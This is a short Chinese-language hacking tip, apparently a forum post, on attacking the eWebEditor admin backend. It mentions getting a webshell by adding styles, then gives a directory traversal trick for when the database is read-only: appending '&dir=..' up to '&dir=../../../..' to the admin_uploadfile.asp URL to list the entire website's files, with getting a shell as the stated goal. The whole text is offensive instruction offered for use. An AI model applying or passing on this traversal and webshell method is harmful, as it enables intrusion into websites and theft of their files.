版本的ewebedit进入后台添加样式.得到webshell很容易. 有时候很不幸.管理员把数据库改为只读权限. 能看不能动 
好在webeditor后台有个小小的缺陷. 可以历遍整个网站目录哦. 当然.数据库为只读的时候一样可以利用.

for:
上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了 

当然 能不能拿到shell 具体问题具体解决..